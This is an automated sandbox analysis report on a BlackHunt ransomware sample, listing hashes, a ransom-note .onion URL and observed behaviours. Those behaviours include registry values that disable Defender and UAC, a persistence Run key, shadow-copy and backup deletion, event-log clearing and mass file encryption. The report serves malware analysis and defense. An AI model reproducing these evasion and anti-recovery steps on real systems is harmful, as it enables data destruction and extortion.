Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
28/01/2024, 16:55
Static task
static1
Behavioral task
behavioral1
Sample
eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe
Resource
win10v2004-20231222-en
General
-
Target
eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe
-
Size
707KB
-
MD5
f61f804d4e954683fde465786ce6fa2c
-
SHA1
6ea10e4f100586e99552889101e64e6bc92b61ef
-
SHA256
a183b5e1befb6280842a93e6e183834682e28641a849c3980df27b5e462a2bb7
-
SHA512
295875e90b0e852911df16bad9bbe1c1319d525b5ee3ac6feb336786e9904e4f8fde238ead1acd6772a58578b7db29bef7cbfef54aa08817653554862d3a087a
-
SSDEEP
6144:/cmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1T84vnh:TuaTmkZJ+naie5OTamgEoKxLWSGh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1692 fsutil.exe 3932 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 3768 wevtutil.exe 2016 wevtutil.exe 2560 wevtutil.exe 2204 wevtutil.exe 2520 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 280 bcdedit.exe 572 bcdedit.exe 3976 bcdedit.exe 1728 bcdedit.exe -
Renames multiple (2879) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2772 wbadmin.exe 3900 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 1524 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Y: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\H: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\E: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\S: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\X: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\W: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\U: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\K: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\N: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\Q: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\T: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\A: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\G: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\V: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\B: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\I: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\O: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\P: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\Z: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\R: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\J: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\L: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\M: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\Java\jre7\#BlackHunt_ReadMe.txt eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BlackRectangle.bmp eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_glass_Thumbnail.bmp eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core_2.3.0.v20131211-1531.jar eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Rothera eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_zh_CN.jar eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_zh_CN.jar eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\VideoLAN\VLC\plugins\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_zh_4.4.0.v20140623020002.jar eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-oql.xml eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\7-Zip\Lang\uk.txt eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\MANIFEST.MF eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro_3.4.200.v20130326-1254.jar eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+4 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\indxicon.gif eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_zh_CN.jar eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\RestoreLock.crw eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kaliningrad eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net_1.2.200.v20120807-0927.jar eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-api.xml eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_zh_CN.jar eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\7-Zip\Lang\da.txt eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\scrapbook.png eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-heapdump.jar eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench_1.1.0.v20140512-1820.jar eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-spi-actions.xml eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\Java\jre7\lib\zi\America\Kentucky\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\VideoLAN\VLC\plugins\mux\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\vlc.mo eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-13 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_ja.jar eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_zh_CN.jar eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\7-Zip\Lang\hr.txt eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterRegular.ttf eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\VideoLAN\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Pyongyang eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha2.png eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2396 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2612 vssadmin.exe 4072 vssadmin.exe 816 vssadmin.exe 1436 vssadmin.exe 1588 vssadmin.exe 2920 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 2120 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" conhost.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2772 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2536 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe Token: SeRestorePrivilege 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe Token: SeBackupPrivilege 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe Token: SeTakeOwnershipPrivilege 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe Token: SeAuditPrivilege 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe Token: SeSecurityPrivilege 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe Token: SeIncBasePriorityPrivilege 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe Token: SeBackupPrivilege 2140 vssvc.exe Token: SeRestorePrivilege 2140 vssvc.exe Token: SeAuditPrivilege 2140 vssvc.exe Token: SeBackupPrivilege 2196 wbengine.exe Token: SeRestorePrivilege 2196 wbengine.exe Token: SeSecurityPrivilege 2196 wbengine.exe Token: SeSecurityPrivilege 3768 wevtutil.exe Token: SeBackupPrivilege 3768 wevtutil.exe Token: SeSecurityPrivilege 2016 wevtutil.exe Token: SeBackupPrivilege 2016 wevtutil.exe Token: SeSecurityPrivilege 2560 wevtutil.exe Token: SeBackupPrivilege 2560 wevtutil.exe Token: SeSecurityPrivilege 2204 wevtutil.exe Token: SeSecurityPrivilege 2520 wevtutil.exe Token: SeBackupPrivilege 2520 wevtutil.exe Token: SeBackupPrivilege 2204 wevtutil.exe Token: SeDebugPrivilege 2120 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2500 wrote to memory of 2700 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 29 PID 2500 wrote to memory of 2700 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 29 PID 2500 wrote to memory of 2700 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 29 PID 2500 wrote to memory of 2700 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 29 PID 2500 wrote to memory of 2796 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 31 PID 2500 wrote to memory of 2796 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 31 PID 2500 wrote to memory of 2796 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 31 PID 2500 wrote to memory of 2796 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 31 PID 2500 wrote to memory of 2812 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 33 PID 2500 wrote to memory of 2812 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 33 PID 2500 wrote to memory of 2812 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 33 PID 2500 wrote to memory of 2812 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 33 PID 2700 wrote to memory of 2784 2700 cmd.exe 35 PID 2700 wrote to memory of 2784 2700 cmd.exe 35 PID 2700 wrote to memory of 2784 2700 cmd.exe 35 PID 2500 wrote to memory of 2696 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 36 PID 2500 wrote to memory of 2696 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 36 PID 2500 wrote to memory of 2696 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 36 PID 2500 wrote to memory of 2696 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 36 PID 2796 wrote to memory of 2356 2796 cmd.exe 39 PID 2796 wrote to memory of 2356 2796 cmd.exe 39 PID 2796 wrote to memory of 2356 2796 cmd.exe 39 PID 2500 wrote to memory of 2992 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 38 PID 2500 wrote to memory of 2992 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 38 PID 2500 wrote to memory of 2992 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 38 PID 2500 wrote to memory of 2992 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 38 PID 2500 wrote to memory of 2752 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 40 PID 2500 wrote to memory of 2752 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 40 PID 2500 wrote to memory of 2752 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 40 PID 2500 wrote to memory of 2752 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 40 PID 2500 wrote to memory of 2536 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 42 PID 2500 wrote to memory of 2536 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 42 PID 2500 wrote to memory of 2536 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 42 PID 2500 wrote to memory of 2536 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 42 PID 2500 wrote to memory of 2520 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 45 PID 2500 wrote to memory of 2520 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 45 PID 2500 wrote to memory of 2520 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 45 PID 2500 wrote to memory of 2520 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 45 PID 2500 wrote to memory of 2632 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 46 PID 2500 wrote to memory of 2632 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 46 PID 2500 wrote to memory of 2632 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 46 PID 2500 wrote to memory of 2632 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 46 PID 2500 wrote to memory of 2764 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 49 PID 2500 wrote to memory of 2764 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 49 PID 2500 wrote to memory of 2764 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 49 PID 2500 wrote to memory of 2764 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 49 PID 2696 wrote to memory of 2160 2696 cmd.exe 140 PID 2696 wrote to memory of 2160 2696 cmd.exe 140 PID 2696 wrote to memory of 2160 2696 cmd.exe 140 PID 2500 wrote to memory of 2592 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 50 